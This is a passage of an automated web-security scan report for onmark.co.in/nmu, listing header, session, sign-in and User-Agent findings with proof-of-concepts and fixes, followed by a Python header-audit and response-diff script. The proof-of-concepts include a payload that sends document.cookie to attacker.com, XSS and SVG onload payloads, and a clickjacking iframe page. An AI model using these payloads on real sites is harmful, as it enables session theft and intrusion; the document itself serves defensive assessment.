`Strict-Transport-Security` header present in the response:\n```http\nHTTP/1.1 200 OK\nContent-Type: text/css; charset=UTF-8\n...\n```\n\n**Business Impact**\n\nWhile direct exploitation risk is low for static assets, the cumulative effect across all endpoints weakens trust boundaries and increases susceptibility to attacks relying on protocol downgrade. It also fails compliance requirements under frameworks like PCI DSS and NIST SP 800-52 Rev. 2 regarding transport layer protections.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://onmark.co.in/nmu/assets/css/bootstrap.css / https://onmark.co.in/nmu/assets/css/bootstrap.css]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/bootstrap.css |\n\n**Description**\n\nThe `X-Content-Type-Options` header prevents browsers from MIME-sniffing a response away from the declared content type. When it is absent, legacy clients (older Internet Explorer in particular) may render a text response as HTML if its bytes look like markup, and current browsers will accept a `<script>` or `<style>` load whose response carries the wrong MIME type instead of refusing it.\n\nIn this case, the CSS file does not include the `X-Content-Type-Options: nosniff` directive, increasing the theoretical surface for content-type confusion.\n\n**Attack Scenario (Proof of Concept)**\n\nIf an attacker could place crafted content on the same origin and have it served as CSS, clients that sniff content could execute embedded script from it:\n\n1. An attacker uploads a crafted file named `malicious.css` containing `<script>alert(1)</script>`.\n2. Without `X-Content-Type-Options: nosniff`, a legacy client that sniffs content may treat the file as HTML instead of CSS when the victim is led to open it directly; current browsers do not sniff a `text/css` response into HTML, so for them this path is closed and the header's value lies in the stricter `<script>`/`<style>` type checks described above.\n3. Where it does occur, execution happens in the origin of the legitimate domain, so the script gets that origin's DOM and any cookies readable from script.\n\nSample response:\n```http\nHTTP/1.1 200 OK\nContent-Type: text/css\n...\n/* Malicious payload here */\n<script>alert(document.cookie)</script>\n```\n\n**Business Impact**\n\nAlthough unlikely to result in immediate compromise, this misconfiguration undermines defense-in-depth strategies and leaves a path open for XSS vectors targeting legacy clients. Regulatory frameworks often mandate robust anti-sniffing controls to prevent unintended execution contexts.\n\n---\n\n### [Information Disclosure - Suspicious Comments / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nSuspicious comments found in the application source code or HTTP responses may inadvertently expose internal logic, development notes, debugging artifacts, or architectural hints useful to attackers during reconnaissance phases. 
These comments are usually remnants left behind during development cycles and should ideally be stripped before deployment.\n\nSuch disclosures provide insight into backend technologies, API structures, error handling mechanisms, or developer workflows—information valuable for crafting targeted exploits.\n\n**Attack Scenario (Proof of Concept)**\n\nDuring manual inspection of page sources or intercepted traffic, an attacker discovers inline comments revealing system internals:\n\n```html\n<!-- TODO: Fix database timeout issue affecting login flow -->\n<!-- DEV NOTE: Temporarily bypass auth check until patch v1.4 -->\n```\n\nThese clues guide further probing toward authentication bypasses or performance-related weaknesses.\n\n**Business Impact**\n\nWhile not directly exploitable alone, exposed metadata aids adversarial modeling and reduces time-to-exploit for follow-up attacks. In regulated environments, presence of debug-level artifacts violates audit trails and software integrity standards.\n\n---\n\n### [Modern Web Application / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nIdentified characteristics suggest the application leverages modern frontend frameworks (React, Angular, Vue.js) or dynamic rendering techniques requiring asynchronous crawling methods beyond traditional spiders. 
Such applications heavily rely on client-side JavaScript to render views dynamically post-load, making them less discoverable using conventional tools.\n\nAutomated scanners must employ headless browser engines capable of executing JavaScript to fully map navigable paths and interactive components.\n\n**Attack Scenario (Proof of Concept)**\n\nStandard crawlers fail to index SPA routes like `/dashboard`, `/profile/edit`, or modals loaded via AJAX calls because they don't simulate DOM interactions. Crawlers that drive a real browser, such as ZAP's Ajax Spider or Burp Suite's browser-based crawler, uncover these surfaces by clicking through the rendered application:\n\nCommand example (runs against a ZAP instance that is already listening; for logged-in areas the spider must run in an authenticated context, otherwise it only sees what an anonymous visitor sees):\n```bash\nzap-cli ajax-spider https://onmark.co.in/nmu/\n```\n\nResultant discovery includes previously unindexed endpoints exposing additional attack vectors.\n\n**Business Impact**\n\nUndiscovered endpoints increase blind spots in vulnerability assessments and leave critical functionality exposed to undetected breaches. Organizations investing in automated scanning infrastructure must ensure compatibility with modern web architectures.\n\n---\n\n### [Session Management Response Identified / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nA session identifier token was detected in the HTTP response, indicating active session management practices. Typically, cookies or custom headers manage stateful sessions after successful authentication. 
Identifying these tokens helps assess session fixation risks, improper invalidation flaws, or predictable patterns susceptible to hijacking.\n\nSession tokens should be generated from a cryptographically secure random source with enough entropy, and carry lifecycle controls: expiration (idle and absolute), and renewal on login and on any change of privilege.\n\n**Attack Scenario (Proof of Concept)**\n\nUpon logging in, the server returns a cookie:\n```http\nSet-Cookie: JSESSIONID=abc123xyz; Path=/; Secure; HttpOnly\n```\n\nWith `Secure` and `HttpOnly` set as shown, script on the page cannot read the value and it is never sent over plaintext HTTP, so the classic capture paths are closed. What remains to test is whether the value issued before login is kept after it (session fixation), whether it is invalidated on logout, whether `SameSite` is set, and how long an idle session stays valid: a value obtained any other way (a proxy or application log that records cookies, a stolen device) can be replayed until the server expires it.\n\n**Business Impact**\n\nImproperly managed sessions facilitate account takeover scenarios, especially in high-value portals. Compliance mandates require strong session hygiene aligned with OWASP recommendations and industry best practices.\n\n---\n\n### [Authentication Request Identified / https://onmark.co.in/nmu/signin / https://onmark.co.in/nmu/signin]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/signin |\n\n**Description**\n\nThe endpoint at `/signin` handles credential submission and represents a prime target for brute-force, credential stuffing, or phishing simulations. 
Recognizing authentication flows enables focused testing around rate limiting, CAPTCHA enforcement, password complexity rules, and multi-factor authentication integration.\n\nAdditionally, analyzing request parameters reveals input sanitization gaps, parameter tampering possibilities, or exposure of backend identifiers.\n\n**Attack Scenario (Proof of Concept)**\n\nPOST request to sign-in form:\n```http\nPOST /nmu/signin HTTP/1.1\nHost: onmark.co.in\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=password123\n```\n\nResponse indicates success/failure states:\n```http\nHTTP/1.1 200 OK\n{\"status\":\"success\",\"redirect\":\"/dashboard\"}\n```\n\nAttackers automate enumeration using tools like Hydra or custom scripts to test known credentials or dictionary lists.\n\n**Business Impact**\n\nWeak authentication safeguards lead to unauthorized access, data exfiltration, and lateral movement opportunities. Breach costs escalate rapidly depending on compromised accounts’ privileges and associated datasets.\n\n---\n\n### [Information Disclosure - Suspicious Comments / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nSimilar to previous findings, suspicious inline comments were observed in the `/user` path output. These may disclose implementation details about user profile handling, validation routines, or backend integrations. 
Attackers utilize such insights to tailor payloads targeting specific behaviors or bypass validations.\n\nComments often reflect temporary workarounds or incomplete cleanup processes that remain visible in production environments.\n\n**Attack Scenario (Proof of Concept)**\n\nHTML snippet returned from `/user`:\n```html\n<!-- FIXME: Remove hardcoded admin flag after migration -->\n<div class=\"admin-flag\" style=\"display:none;\">true</div>\n```\n\nA hidden role flag like this is worth following up: if any authorization decision were taken from it client-side, flipping the value in the DOM would be trivial, so verify that the server enforces the role independently of what the page claims.\n\n**Business Impact**\n\nExposure of business logic fragments compromises operational secrecy and facilitates targeted exploitation. Internal documentation leakage violates principle of least privilege and increases insider threat vectors.\n\n---\n\n### [Modern Web Application / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nAs noted earlier, modern web apps depend on rich client-side rendering and asynchronous updates. The `/user` route likely involves dynamic UI generation, lazy loading modules, or reactive data binding, all features requiring intelligent spidering approaches to enumerate comprehensively.\n\nFailure to crawl such interfaces leaves significant portions of the app untested and potentially vulnerable.\n\n**Attack Scenario (Proof of Concept)**\n\nA quick static pass over the served HTML (routes requested only after JavaScript runs need a headless browser, or a pass over the JS bundles, to show up):\n```bash\ncurl -s https://onmark.co.in/nmu/user | grep -oE '/api/[a-zA-Z0-9/_\\-]+'\n```\n\nReveals undocumented API endpoints used internally by frontend logic, expanding attack surface beyond statically mapped URLs.\n\n**Business Impact**\n\nIncomplete coverage leads to undetected vulnerabilities in core user-facing functionalities. 
Risk grows proportionally with reliance on complex frontends managing sensitive operations like profile editing or financial transactions.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/css / https://onmark.co.in/nmu/assets/css]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css |\n\n**Description**\n\nFuzzing different User-Agent strings produced responses that differ (in status code, size or body), suggesting adaptive delivery or device-specific handling. Servers sometimes serve distinct content based on perceived client capabilities, which can introduce inconsistencies in caching, compression, or feature availability.\n\nThis check is informational and needs manual confirmation: a WAF or CDN in front of the origin is the most common cause, since it may answer unfamiliar or bot-like agents with a challenge page or a 403, and a cache that varies on `User-Agent` can return different stored variants. Only if the origin itself behaves differently do the follow-ups (mobile/desktop parity, access-control differences between variants) apply.\n\n**Attack Scenario (Proof of Concept)**\n\nSending two requests, one simulating a desktop and one a mobile browser:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (Windows NT)\" https://onmark.co.in/nmu/assets/css\ncurl -H \"User-Agent: Mozilla/5.0 (iPhone; iOS)\" https://onmark.co.in/nmu/assets/css\n```\n\nCompare status codes, and hash each body (`sha256sum`) to detect divergent behavior; if the difference is a challenge or block page, attribute it to the edge, not the application.\n\n**Business Impact**\n\nBehavioral divergence introduces inconsistency in user experience and creates potential avenues for cache poisoning or selective denial-of-service conditions. 
Mobile-first design principles demand uniformity regardless of agent string.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets / https://onmark.co.in/nmu/assets]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets |\n\n**Description**\n\nSame rationale applies here—responses vary per User-Agent string, possibly due to responsive asset serving or conditional redirects. This behavior warrants deeper investigation to confirm whether alternate versions expose differing levels of access or contain unique vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**\n\nRequesting same directory with varied agents:\n```bash\ncurl -I -H \"User-Agent: Googlebot\" https://onmark.co.in/nmu/assets/\ncurl -I -H \"User-Agent: curl/7.68.0\" https://onmark.co.in/nmu/assets/\n```\n\nObserve differences in `Location`, `Cache-Control`, or `Content-Encoding`.\n\n**Business Impact**\n\nUnintended behavioral shifts undermine consistency guarantees and complicate monitoring efforts. SEO implications arise if crawler-specific variants differ significantly from standard browsing experiences.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu / https://onmark.co.in/nmu]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu |\n\n**Description**\n\nRoot-level fuzzing confirms differential treatment of root path based on User-Agent. This suggests either adaptive routing logic or content negotiation features implemented server-side. 
Such flexibility enhances usability but requires careful scrutiny to avoid introducing logical flaws.\n\n**Attack Scenario (Proof of Concept)**\n\nTesting with search engine bot:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://onmark.co.in/nmu\n```\n\nMay return structured schema markup or sitemap references absent in regular visitor views.\n\n**Business Impact**\n\nDivergence in root-level presentation impacts both accessibility and SEO performance. Misaligned indexing strategies can skew analytics and degrade organic reach metrics.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/signin / https://onmark.co.in/nmu/signin]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/signin |\n\n**Description**\n\nSign-in pages often adapt layout or functionality according to device type. Detecting variance implies possible mobile-specific login flows or alternative authentication schemes triggered by certain agents.\n\nThese adaptations must undergo equal scrutiny to ensure equivalent security postures across platforms.\n\n**Attack Scenario (Proof of Concept)**\n\nMobile view may omit MFA prompts or display simplified forms:\n```bash\ncurl -H \"User-Agent: Android WebView\" https://onmark.co.in/nmu/signin\n```\n\nCould reveal reduced friction paths exploitable by attackers masquerading as mobile clients.\n\n**Business Impact**\n\nReduced friction equals increased risk. 
Weaker authentication flows on mobile channels violate principle of consistent identity verification and elevate breach probability.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/images / https://onmark.co.in/nmu/assets/images]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/images |\n\n**Description**\n\nImage directories responding differently to various User-Agents may indicate an optimized delivery pipeline or format switching (WebP vs JPEG). If that is the case, an image-processing path (conversion, resizing) is reachable with attacker-chosen inputs; decoders are a recurring source of memory-safety bugs, so confirm which library performs the conversion and that it is current. The variance may equally be produced by a CDN or WAF in front of the origin rather than by the application.\n\n**Attack Scenario (Proof of Concept)**\n\nRequesting image with malformed agent:\n```bash\ncurl -H \"User-Agent: <img src=x onerror=alert(1)>\" https://onmark.co.in/nmu/assets/images/logo.png\n```\n\nThis payload does not attack the image; it probes whether the header is reflected unescaped into an error page or a log viewer, where it would become stored XSS, and whether oversized or malformed header values change the response.\n\n**Business Impact**\n\nPerformance optimizations shouldn’t compromise security. Unsanitized transformation pipelines pose latent risks especially when interfacing with third-party libraries or legacy decoders.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/js / https://onmark.co.in/nmu/assets/js]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js |\n\n**Description**\n\nJavaScript bundles delivered conditionally based on User-Agent imply modular builds or polyfill injection tailored to browser support matrices. 
Variance in JS payloads raises concerns about outdated dependencies or feature flags enabling deprecated APIs.\n\n**Attack Scenario (Proof of Concept)**\n\nOlder browsers receive the legacy bundle (a bare \"IE 11\" token will not be recognised; the real Internet Explorer 11 string is the `Trident/7.0; rv:11.0` form):\n```bash\ncurl -sS -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\" https://onmark.co.in/nmu/assets/js/main.js\n```\n\nCompare the returned bundle with the one served to a current browser (size, hash, embedded library version strings). The legacy build may ship older polyfills or third-party libraries with known vulnerabilities that the modern build no longer includes.\n\n**Business Impact**\n\nLegacy compatibility layers expand the attack surface unnecessarily. Maintaining parallel builds increases maintenance overhead and lets the builds drift apart, so a fix that lands in one may be missing from the other.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nUser profile pages adapting to device types or screen sizes demonstrate a responsive design philosophy. However, such adaptation must preserve functional equivalence and security controls uniformly.\n\n**Attack Scenario (Proof of Concept)**\n\nThe mobile profile view may omit CSRF tokens or other request-integrity controls (the User-Agent has no bearing on TLS, so \"weaker encryption\" is not a realistic outcome of this variance). Request the page with an iPhone Safari User-Agent and compare the form fields with the desktop response:\n```bash\ncurl -sSi -H \"User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1\" https://onmark.co.in/nmu/user\n```\n\nMissing protections make the mobile variant an easier target for session riding (CSRF): an attacker's page cannot set the victim's User-Agent, but a victim browsing from a phone supplies the mobile one automatically, so the weaker variant is exactly what a forged request reaches.\n\n**Business Impact**\n\nDevice-specific deviations erode trust boundaries and fragment the security model. 
Consistent UX and hardened defenses are prerequisites for enterprise-grade applications.\n\n---\n\n### [Content Security Policy Configuration / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nAbsence of a Content Security Policy (CSP) header removes a crucial client-side layer of protection against XSS, clickjacking and data injection. CSP defines the origins trusted for script execution, frame embedding and object instantiation, effectively sandboxing potentially harmful content.\n\nWithout CSP, inline scripts, `eval()` and arbitrary external resource loads proceed unchecked, amplifying the impact of any reflected or stored XSS flaw.\n\n**Attack Scenario (Proof of Concept)**\n\nIf a reflected or stored XSS sink exists (none is reported by this scan; CSP is a defense-in-depth control, not a fix for the sink itself), a payload such as the following executes unhindered:\n```html\n<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">\n```\n\nNo policy blocks the inline handler or restricts the outbound `fetch()` to attacker.com. Stealing the cookie this way additionally requires the session cookie to lack the `HttpOnly` flag; a policy with a nonce- or hash-based `script-src` and `connect-src 'self'` would stop both steps.\n\n**Business Impact**\n\nLack of CSP exposes the organization to the full impact of any XSS flaw, leading to credential theft, defacement and brand reputation erosion. CSP is a baseline control in common web hardening guidance and its absence is routinely flagged in assessments.\n\n**Remediation**\n\nAdd a `Content-Security-Policy` header, deploying it first as `Content-Security-Policy-Report-Only` to find breakage: `default-src 'self'`, a nonce- or hash-based `script-src` without `'unsafe-inline'`, `object-src 'none'`, `base-uri 'self'` and `frame-ancestors 'none'` (or the specific origins allowed to frame the page).\n\n---\n\n### [Clickjacking Protection / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe missing `X-Frame-Options` header (and, per the CSP finding above, the absence of the modern equivalent `Content-Security-Policy: frame-ancestors`) allows the landing page to be framed by arbitrary third-party pages, facilitating clickjacking attacks. 
Users unknowingly interact with overlaid elements controlled by the adversary, triggering unintended actions such as changing settings or initiating transfers.\n\nClickjacking remains potent despite declining prevalence thanks to improved browser defaults (notably `SameSite=Lax` cookies, which stop many cross-site framed requests from carrying the session) and awareness campaigns.\n\n**Attack Scenario (Proof of Concept)**\n\nMalicious page embedding the target in an invisible iframe stacked above a decoy:\n```html\n<iframe src=\"https://onmark.co.in/nmu/\" width=\"100%\" height=\"100%\" style=\"opacity:0;position:absolute;top:0;left:0;z-index:2\"></iframe>\n<div style=\"position:absolute;top:100px;left:200px;z-index:1;\">\n  Click here to win free gift!\n</div>\n```\n\nThe victim clicks believing they are interacting with the decoy while actually activating a button in the transparent frame. Verify by opening such a page in a browser: if the frame renders instead of being refused, the protection is absent.\n\n**Business Impact**\n\nClickjacking undermines user autonomy and enables social-engineering attacks. Financial institutions and e-commerce sites face heightened liability due to transactional deception risk.\n\n**Remediation**\n\nSend `X-Frame-Options: DENY` (or `SAMEORIGIN`) together with `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`); the latter is the standardised control that current browsers honour.\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe core landing page lacks HSTS enforcement, leaving room for protocol downgrade attacks. Despite supporting HTTPS, the absence of HSTS means every visit that begins over plain HTTP (a URL typed without a scheme, an http:// link or bookmark) can be intercepted before the redirect to HTTPS, undermining the long-term encryption assurance.\n\nHSTS preload list submission is impossible without a correct configuration.\n\n**Attack Scenario (Proof of Concept)**\n\nInitial visit over HTTP:\n```http\nGET / HTTP/1.1\nHost: onmark.co.in\n```\n\nThe server redirects to HTTPS:\n```http\nHTTP/1.1 301 Moved Permanently\nLocation: https://onmark.co.in/\n```\n\nbut the subsequent HTTPS response carries no `Strict-Transport-Security` header (browsers ignore the header on plain-HTTP responses, so it must be sent on the HTTPS response to have any effect). Because nothing is cached, the next visit starts over HTTP again and an on-path attacker can answer that first request with an attacker-controlled page or proxy the session in the clear.\n\n**Business Impact**\n\nPersistent downgrade risk reduces confidence in encrypted communications. 
Security baselines used in PCI DSS and government assessments routinely expect HSTS on every HTTPS host in the domain.\n\n**Remediation**\n\nSend `Strict-Transport-Security: max-age=31536000; includeSubDomains` on all HTTPS responses (add `preload` only once every subdomain is confirmed to serve HTTPS) and keep the HTTP-to-HTTPS redirect in place.\n\n---\n\n### [MIME Type Confusion / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe missing `X-Content-Type-Options: nosniff` header permits MIME-type sniffing: a browser may ignore the declared `Content-Type` and guess the type from the leading bytes, so content served as `text/plain` or with a wrong type can be interpreted as HTML or script. Legacy browsers sniff far more aggressively, but the header remains relevant in current ones, which use it to refuse `<script>` and stylesheet resources served with a non-matching type.\n\nSniffing turns an XSS payload embedded in a seemingly safe format, such as an uploaded image or stylesheet, into executable content.\n\n**Attack Scenario (Proof of Concept)**\n\nUploading an SVG disguised as an image and served with a generic or wrong Content-Type such as `text/plain`:\n```xml\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(1)\"/>\n```\n\nA sniffing browser renders the response as markup instead of treating it as inert data and runs the `onload` handler. Note that `nosniff` does not help when the file is correctly served as `image/svg+xml` and opened as a top-level document; user uploads that may contain active content need a separate origin or `Content-Disposition: attachment` in addition.\n\n**Business Impact**\n\nSupporting legacy browsers expands the attack footprint unnecessarily. Organizations maintaining backward compatibility must balance convenience with security rigor.\n\n**Remediation**\n\nSend `X-Content-Type-Options: nosniff` on every response and ensure each resource carries an accurate `Content-Type`.","summary":{"total":59}},"summary":{"total":59}}]
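The five User-Agent Fuzzer findings and the four header findings (CSP, clickjacking, HSTS, nosniff) in the report above share one verification step: fetch the same URL under several User-Agent strings, compare the security-relevant parts of each response, and audit each response for the missing headers. The following Python script is an added example; it is not part of the scanner output or of onmark.co.in. The User-Agent strings follow the real vendor formats (version numbers are illustrative), the target URL is supplied by the tester on the command line, and the CSRF/MFA field-name patterns and the sample responses embedded at the bottom are constructed assumptions so the comparison logic can run offline.

```python
"""User-Agent differential check plus a security-header audit (added example).

Fetches one URL under several User-Agents, reports features that differ between
the responses, and audits each response for the header findings in the report.
The field-name patterns and SAMPLE_VARIANTS are constructed assumptions.
"""
import re
import urllib.error
import urllib.request
from dataclasses import dataclass

# Real vendor User-Agent formats; version numbers are illustrative.
USER_AGENTS = {
    "desktop": ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"),
    "iphone": ("Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 "
               "(KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"),
    "android-webview": ("Mozilla/5.0 (Linux; Android 13; Pixel 7 Build/TQ3A.230805.001; wv) "
                        "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.0.0 Mobile Safari/537.36"),
    "ie11": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "bingbot": "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
}
SECURITY_HEADERS = ("strict-transport-security", "content-security-policy",
                    "x-frame-options", "x-content-type-options")
ONE_YEAR = 31536000


@dataclass
class Variant:
    ua_name: str
    status: int
    headers: dict  # header names lower-cased
    body: str


def fetch(url, ua_name):
    """Fetch url with the named User-Agent; non-2xx responses are kept, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": USER_AGENTS[ua_name]})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            hdrs, status, raw = resp.headers, resp.status, resp.read(200_000)
    except urllib.error.HTTPError as err:
        hdrs, status, raw = err.headers, err.code, err.read(200_000)
    return Variant(ua_name, status, {k.lower(): v for k, v in hdrs.items()},
                   raw.decode("utf-8", "replace"))


def profile(v):
    """Reduce a response to the features worth comparing across User-Agents."""
    feats = {"status": v.status, **{h: v.headers.get(h) for h in SECURITY_HEADERS}}
    # Form-level controls; the field-name patterns are assumptions about the app.
    feats["csrf_token"] = bool(re.search(
        r'name=["\'](csrf[_-]?token|_token|authenticity_token)["\']', v.body, re.I))
    feats["mfa_field"] = bool(re.search(
        r'name=["\'](otp|mfa_code|totp|one_time_code)["\']', v.body, re.I))
    return feats


def diff_variants(variants):
    """{feature: {ua_name: value}} for every feature not identical across variants."""
    profiles = {v.ua_name: profile(v) for v in variants}
    keys = sorted(set().union(*(p.keys() for p in profiles.values())))
    return {k: {n: p.get(k) for n, p in profiles.items()}
            for k in keys if len({repr(p.get(k)) for p in profiles.values()}) > 1}


def audit_headers(headers):
    """Header findings mirroring the report: missing or weak HSTS/CSP/framing/nosniff."""
    findings = []
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("HSTS missing")
    elif not (m := re.search(r"max-age=(\d+)", hsts, re.I)) or int(m.group(1)) < ONE_YEAR:
        findings.append("HSTS max-age below one year")
    csp = headers.get("content-security-policy", "")
    if not csp:
        findings.append("CSP missing")
    else:
        src = re.search(r"(?:^|;)\s*script-src([^;]*)", csp)
        # Browsers ignore 'unsafe-inline' when a nonce or hash source is also present.
        if src and "'unsafe-inline'" in src.group(1) \
                and not re.search(r"'(nonce|sha256|sha384|sha512)-", src.group(1)):
            findings.append("CSP script-src allows 'unsafe-inline' without nonce/hash")
    if "x-frame-options" not in headers and "frame-ancestors" not in csp:
        findings.append("no framing protection (X-Frame-Options or CSP frame-ancestors)")
    if headers.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    return findings


# Constructed sample responses (not captured from onmark.co.in): the WebView
# variant of a sign-in page lacks the OTP field that the desktop variant has.
SAMPLE_VARIANTS = [
    Variant("desktop", 200, {"content-type": "text/html; charset=utf-8"},
            '<form method="post"><input name="_token" value="t0k3n">'
            '<input type="password" name="pw"><input name="otp"></form>'),
    Variant("android-webview", 200, {"content-type": "text/html; charset=utf-8"},
            '<form method="post"><input name="_token" value="t0k3n">'
            '<input type="password" name="pw"></form>'),
]

if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else None
    variants = [fetch(url, n) for n in USER_AGENTS] if url else SAMPLE_VARIANTS
    for v in variants:
        print(v.ua_name, v.status, audit_headers(v.headers))
    for feat, per_ua in diff_variants(variants).items():
        print("DIFF", feat, per_ua)
```

Run it as `python3 ua_diff.py https://onmark.co.in/nmu/signin` to compare live responses, or with no argument to see the constructed case: the only differing feature is `mfa_field`, and every sample response trips all four header checks. A User-Agent difference reported by the scanner is only worth escalating when `diff_variants` shows a security-relevant feature (a missing token or MFA field, a weaker header set) rather than just a different body length.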